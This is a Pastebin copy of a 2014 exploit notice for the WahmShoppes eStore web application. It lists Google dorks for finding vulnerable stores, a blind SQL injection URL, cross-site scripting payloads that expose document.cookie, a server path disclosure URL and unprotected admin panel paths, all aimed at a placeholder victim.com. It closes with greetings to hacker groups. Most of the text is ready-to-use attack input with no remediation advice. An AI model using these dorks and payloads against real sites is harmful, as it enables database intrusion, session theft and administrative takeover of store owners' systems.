Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Full title WahmShoppes eStore Cross Site Scripting / SQL Injection Vulnerabilities
- Date add 2014-06-07
- Category web applications
- Platform php
- Risk [<font color="#FF0000">Security Risk Critical</font>]
- Description WahmShoppes eStore suffers from cross site scripting, information disclosure, and remote SQL injection vulnerabilities.
- ===================================================
- #+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
- # Title : multiple Vulnerability in "WahmShoppes eStore"
- # Author : alieye
- # vendor : http://www.wahmshoppes.com/
- # Contact : cseye_ut@yahoo.com
- # Risk : High
- # Class: Remote
- # Google Dork:
- # inurl:WsError.asp
- # inurl:store/ We apologize but your request rendered no results
- # Version: all version
- # Date: 05/06/2014
- #++++++++++++++++++++++++++++++++++++++++++++++++++++++++
- 1-Blind SQL Injection
- http://victim.com/store/WsDefault.asp?One=-999 AND 1=1+UNION+SELECT+...etc
- ---------------------------------------------------------
- 2-Cross Site Scripting
- http://victim.com/store/WsError.asp?msg=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
- http://victim.com/store/WsRequestpwd.asp?msg=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
- ---------------------------------------------------------
- 3-Information Disclosure in image location
- http://victim.com/store/thumb.asp?path=X:/server path and domain name/example.jpg
- ---------------------------------------------------------
- 4-show admin panel tools
- http://victim.com/store/frmLeft.asp
- ---------------------------------------------------------
- Admin page
- http://victim.com/store/admin/Default.asp
- #++++++++++++++++++++++++++++++++++++++++++++++++++++++++
- [#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph , f4rm4nd3 and all cseye members
- [#] Thanks To All Iranian Hackers
- [#] website : http://cseye.vcp.ir/
- #++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement